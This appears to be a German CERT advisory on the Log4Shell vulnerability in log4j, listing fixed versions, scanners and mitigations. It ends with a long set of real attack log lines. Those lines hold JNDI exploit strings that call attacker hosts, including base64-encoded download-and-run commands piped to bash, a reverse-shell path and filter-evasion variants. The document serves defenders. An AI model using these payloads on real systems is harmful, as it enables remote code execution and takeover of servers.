15.12.2021 12:00

Special Report: Empfehlungen zu Log4Shell

14. Dezember 2021

Dokumenthistorie

Version	Datum	Beschreibung
1.0	14.12.2021 17:30	Initiale Fassung
1.1	15.12.2021 12:00	veraltete Mitigations entfernt
1.2	15.12.2021 17:00	weitere Mitigations
1.3	23.12.2021 14:45	CVE(s) ergänzt, Aktualisierung der gefixten Versionen
1.4	29.12.2021 12:10	CVE ergänzt, Aktualisierung der gefixten Versionen, weitere Sampledaten

Allgemeines

In einer weit verbreiteten Java-Bibliothek (log4j) existiert eine kritische Schwachstelle, auch "Log4Shell" genannt, welche im Worst-Case die vollständige Übernahme des betroffenen Systems ermöglicht. "Weit verbreitet" bedeutet in diesem Fall eine große Anzahl an unterschiedlicher Software und Appliances welche auf den ersten Blick nichts mit JAVA zu tun haben müssen. Die Version 2.16.0 behebt das Problem und ist bereits verfügbar. Lesen Sie hierzu auch unsere separate Warnung welche laufend aktualisiert wird. Zusätzlich werden externe Scans ausgewertet, und betroffene Unternehmen durch uns kontaktiert.

Update: 23. Dezember 2021

Nach Behebung der ursprünglichen Schwachstelle CVE-2021-44228 mit Log4j Version 2.15, stellte sich heraus, dass dieser Fix nur unzureichend war und Version 2.15 für die neu entdeckte Schwachstelle CVE-2021-45046 verwundbar ist. Inital als DoS klassifiziert, wurde diese Sicherheitslücke zur RCE mit einem CVSS Score von 9.0 hochgestuft. Log4j Version 2.16 behebt zwar auch dieses Problem, ist jedoch wiederum für die kurz nach Veröffentlichung des Updates gefundene Schwachstelle CVE-2021-45105 (CVSS Score 7.5) anfällig. Das erfolgreiche Ausnützen dieser Sicherheitslücke führt mittels eines rekursiven Lookups zu einem Denial-of-Service Zustand und einer Terminierung der Anwendung.

Update: 29. Dezember 2021

Nach mehreren Patches für die ursprünglich angreifbare Log4j-Version (2.14) ist es einem Sicherheitsforscher nun gelungen, auch die aktuellste Version (2.17) anzugreifen. Die Komplexität des Angriffs ist allerdings signifkant höher und erfordert als Grundvorraussetzung Konfigurationen, die nicht in den Standardeinstellungen vorgesehen sind. Eine Angreifer:in mit Zugriff auf die Konfigurationsdateien für Log4j kann diese präparieren, um Log4j dazu zu bringen, einen JDBC-Adapter zu nutzen, um Ressourcen via JNDI nachzuladen.

Detektion

Um ihre Systeme auf betroffene Java-Komponenten auf Dateisystem-Ebene zu untersuchen, empfiehlt CERT.at den durch Logpresso bereitgestellten Scanner. Der Scanner steht sowohl als ausführbares Programm, als auch zum selber Kompilieren bereit. Netzwerkadministratoren, welche eine Flotte an Systemen über das Netzwerk testen möchten, können auf den Scanner von fullhunt.io zurückgreifen. Dieser Scanner verwendet im Backend Interactsh, welches selber betrieben werden kann.

Mitigationen

Aus der Branche haben wir von folgenden Mitigationen berichtet bekommen, welche zum Teil erfolgreich eingesetzt werden konnten:

Patchen, Patchen, Patchen!

Zum jetzigen Zeitpunkt ist ein Update der log4j-Bibliothek die nachhaltigste Mitigation. Neben neuen Standard-Einstellungen, welche dazu führen, dass frische Neu-Installationen nicht verwundbar sind, wurden auch weitere Probleme im Bezug auf JNDI-Lookups behoben. In Version 2.16.0 werden JNDI-Lookups standardmäßig nur auf localhost durchgeführt.

Update: 23. Dezember 2021

Laut den aktualisierten Patch Notes von Apache, sind die Sicherheitslücken CVE-2021-45046 und CVE-2021-45105 in den folgenden Versionen behoben:

CVE-2021-45046 (RCE): Log4j 2.16.0 (Java 8) und Log4j 2.12.2 (Java 7)
CVE-2021-45105 (DoS): Log4j 2.17.0 (Java 8), 2.12.3 (Java 7) und 2.3.1 (Java 6)

JNDI deaktivieren

Über das Integrieren einer leeren JndiLookup-Klasse kann das Auflösen sämtlicher JNDI-Direktiven unterbunden werden. Die Vorgehensweise hierzu, sowie die benötigten Class-Files, aus folgendem Repo können als Vorlage für eine eigene Umsetzung dienen. Der Patch gibt leere JNDI-Lookups zurück, womit Log4j2 umgehen kann.

Verwenden Sie niemals Code aus unbekannten Quellen, ohne diesen selber zu verstehen und gesichtet zu haben!

Blockieren von ausgehendem Traffic

Um im Falle eines erfolgreichen Angriffs das Nachladen von Schadsoftware zu verhindern, können Netzwerkverbindungen in ausgehender Richtung auf der Firewall blockiert werden. In manchen Fällen kann dies dazu führen, dass die Funktionalität des Systems beeinträchtigt wird - wo möglich empfehlen wir jedoch diese Maßnahme als zusätzlichen Schutz umzusetzen. Eine DENY ANY ANY-Regel auf Firewall-Ebene wird vorallem in Server-Netzwerken als Best-Practice erachtet und ist, falls nicht bereits implementiert, empfehlenswert. Je nach Hersteller und Produkt gestaltet sich die Umsetzung unterschiedlich.

Das Blockieren von ausgehendem Netzwerk-Traffic betroffener Systeme, kann Angriffe erschweren - es ist jedoch davon auszugehen das diese Mitigation keine nachhaltige Problembehebung darstellt. Zusätzliche Mechanismen zur Sicherung des eigenen Netzwerkes sind jedoch grundsätzlich empfehlenswert.

Vulnerable log4j-core-.jar/.war/*.ear repackagen

Diese Mitigation wird für log4j Versionen vor 2.10.0 2.16.0 benötigt, da andere Mitigationen wie das Setzen von Umgebungsvariablen, oder Startparametern erst ab Version 2.10.0 und höher Abhilfe schaffen , wenn nicht gepatcht werden kann.

.jar/.war/.ear-File entpacken
Entfernen der Komponente JndiLookup.class
Erneutes Packen der verbleibenden Komponenten

Achtung: Diese Mitigation verursacht unter Umständen Fehler in der betriebenen Applikation, da Komponenten aus dem zugehörigen .jar-File entfernt wurden (java.lang.ClassNotFoundException)

JVM-Startparameter

Wenn die betriebene Applikation betroffen ist, und momentan nicht durch Patches repariert werden kann, ist es möglich die JVM mit folgendem Parameter zu starten, um das Auflösen von ${jndi://...}-Direktiven zu verhindern: java -Dlog4j2.formatMsgNoLookups=true

Umgebungsvariablen

Das Auflösen von JNDI-Direktiven kann auch über das Setzen folgender Umgebungsvariable ebenfalls unterbunden werden: LOG4J_FORMAT_MSG_NO_LOOKUPS=true Diese Variable muss in der Umgebung gesetzt werden, welche durch die JVM genutzt wird.

Update: 29. Dezember 2021

Laut den aktualisierten Patch Notes von Apache, ist die Sicherheitslücke CVE-2021-44832 in den folgenden Versionen behoben:

Log4j 2.3.2 (Java 6), 2.12.4 (Java 7), und 2.17.1 (Java 8 und höher)

Live-Artefakte

Folgende, anonymisierte Auszüge eines Log-Files wurden uns zugespielt. So könnte ein Angriff auf ihrem System in den Log-Files aussehen:

185.220.100.255 - - [10/Dec/2021:14:50:33 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://46acb4a3635f.bingsearchlib.com:39356/a}"
45.155.205.233 - - [10/Dec/2021:15:23:34 +0100] "GET / HTTP/1.1" 200 10004 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
157.245.109.75 - - [10/Dec/2021:17:13:54 +0100] "GET / HTTP/1.1" 200 10220 "-" "${jndi:http://134.209.163.248/callback/https-port-443-and-http-callback-scheme}"
157.245.109.75 - - [10/Dec/2021:17:13:55 +0100] "GET /favicon.ico HTTP/1.1" 404 521 "-" "${jndi:http://134.209.163.248/callback/https-port-443-and-http-callback-scheme}"
45.155.205.233 - - [10/Dec/2021:19:49:58 +0100] "GET / HTTP/1.1" 200 10004 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
188.166.122.43 - - [10/Dec/2021:21:01:44 +0100] "GET / HTTP/1.1" 200 10240 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
188.166.122.43 - - [10/Dec/2021:21:01:44 +0100] "GET / HTTP/1.1" 301 572 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
188.166.122.43 - - [10/Dec/2021:21:01:45 +0100] "GET /favicon.ico HTTP/1.1" 404 523 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
167.71.13.196 - - [10/Dec/2021:22:02:18 +0100] "GET /$%7Bjndi:ldaps://8bb9213c.probe001.log4j.leakix.net:32344/b%7D?${jndi:ldaps://8bb9213c.probe001.log4j.leakix.net:32344/b}=${jndi:ldaps://8bb9213c.probe001.log4j.leakix.net:32344/b} HTTP/1.1" 404 5031 "-" "${jndi:ldaps://8bb9213c.probe001.log4j.leakix.net:32344/b}"
188.166.48.55 - - [11/Dec/2021:01:37:29 +0100] "GET / HTTP/1.1" 301 572 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://log4j.bin${upper:a}ryedge.io:80/callback}"
188.166.48.55 - - [11/Dec/2021:01:37:30 +0100] "GET / HTTP/1.1" 200 10240 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://log4j.bin${upper:a}ryedge.io:80/callback}"
188.166.48.55 - - [11/Dec/2021:01:37:31 +0100] "GET /favicon.ico HTTP/1.1" 404 523 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://log4j.bin${upper:a}ryedge.io:80/callback}"
45.137.21.9 - - [11/Dec/2021:03:36:47 +0100] "POST / HTTP/1.1" 301 535 "-" "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}"
47.102.199.233 - - [11/Dec/2021:11:19:43 +0100] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 5196 "-" "curl/7.58.0"
157.230.32.67 - - [11/Dec/2021:17:20:26 +0100] "GET / HTTP/1.1" 301 572 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
157.230.32.67 - - [11/Dec/2021:17:20:28 +0100] "GET / HTTP/1.1" 200 10240 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
157.230.32.67 - - [11/Dec/2021:17:20:28 +0100] "GET /favicon.ico HTTP/1.1" 404 523 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
217.112.83.246 - - [11/Dec/2021:18:10:13 +0100] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 5191 "-" "curl/7.58.0"
139.59.224.7 - - [11/Dec/2021:18:24:20 +0100] "GET / HTTP/1.1" 200 9985 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
167.71.13.196 - - [11/Dec/2021:21:55:10 +0100] "GET /$%7Bjndi:ldaps://979d1317.probe001.log4j.leakix.net:9200/b%7D?${jndi:ldaps://979d1317.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://979d1317.probe001.log4j.leakix.net:9200/b} HTTP/1.1" 404 5031 "-" "${jndi:ldaps://979d1317.probe001.log4j.leakix.net:9200/b}"
139.59.224.7 - - [12/Dec/2021:00:25:01 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
45.155.205.233 - - [12/Dec/2021:06:05:38 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
45.155.205.233 - - [12/Dec/2021:06:05:38 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
45.83.66.88 - - [13/Dec/2021:01:15:30 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 610 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"
137.184.102.188 - - [13/Dec/2021:02:46:54 +0100] "GET / HTTP/1.1" 200 10220 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
137.184.102.188 - - [13/Dec/2021:02:46:54 +0100] "GET /favicon.ico HTTP/1.1" 404 521 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
45.83.65.225 - - [13/Dec/2021:03:14:37 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 610 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"
45.146.164.160 - - [13/Dec/2021:04:22:25 +0100] "GET / HTTP/1.1" 200 10004 "-" "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}"
45.83.64.149 - - [13/Dec/2021:04:54:47 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 5017 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}"
195.54.160.149 - - [13/Dec/2021:06:00:11 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [13/Dec/2021:06:00:13 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
167.172.44.255 - - [13/Dec/2021:21:27:17 +0100] "GET / HTTP/1.0" 301 537 "-" "borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}"
112.74.52.90 - - [13/Dec/2021:21:34:38 +0100] "GET / HTTP/1.1" 200 9985 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"
45.146.164.160 - - [14/Dec/2021:00:11:53 +0100] "GET / HTTP/1.1" 200 10004 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:1389/t}"
45.146.164.160 - - [14/Dec/2021:00:11:53 +0100] "GET / HTTP/1.1" 200 10004 "-" "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}"
45.146.164.160 - - [14/Dec/2021:00:11:54 +0100] "GET / HTTP/1.1" 200 10004 "-" "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}"
45.146.164.160 - - [14/Dec/2021:00:11:54 +0100] "GET / HTTP/1.1" 200 10004 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
195.54.160.149 - - [14/Dec/2021:02:58:36 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [14/Dec/2021:02:58:37 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
167.71.13.196 - - [14/Dec/2021:05:54:55 +0100] "GET /$%7Bjndi:ldap://167.71.13.196:443/lx-ffff591678f8bb01009f23b86100000000b14e97%7D?${jndi:ldap://167.71.13.196:443/lx-ffff591678f8bb01019f23b8610000000096fcdf}=${jndi:ldap://167.71.13.196:443/lx-ffff591678f8bb01029f23b861000000001de141} HTTP/1.1" 400 4546 "-" "${jndi:ldap://167.71.13.196:443/lx-ffff591678f8bb01089f23b861000000002d265d}"
157.90.35.190 - - [15/Dec/2021:03:02:31 +0100] "GET / HTTP/1.1" 301 531 "-" "${jndi:ldap://162.55.90.26/1494644984/C}"
157.245.108.125 - - [15/Dec/2021:05:04:55 +0100] "GET / HTTP/1.0" 301 537 "-" "borchuk/3.1 ${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}"
194.195.244.81 - - [15/Dec/2021:07:27:55 +0100] "GET / HTTP/1.1" 301 516 "${jndi:dns://89-22-120-248.scanworld.net/ref}" "${jndi:dns://89-22-120-248.scanworld.net/ua}"
195.54.160.149 - - [15/Dec/2021:19:01:13 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [15/Dec/2021:19:01:14 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [16/Dec/2021:06:02:14 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [16/Dec/2021:15:45:27 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [16/Dec/2021:15:45:32 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
45.83.67.29 - - [17/Dec/2021:00:07:54 +0100] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-5wffiu4eamm3bqq6%7D HTTP/1.1" 301 752 "-" "${${::-j}ndi:dns://45.83.64.1/securityscan-s6szuuadrvghomd4}"
46.105.95.220 - - [17/Dec/2021:02:31:51 +0100] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 604 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
46.105.95.220 - - [17/Dec/2021:02:31:51 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
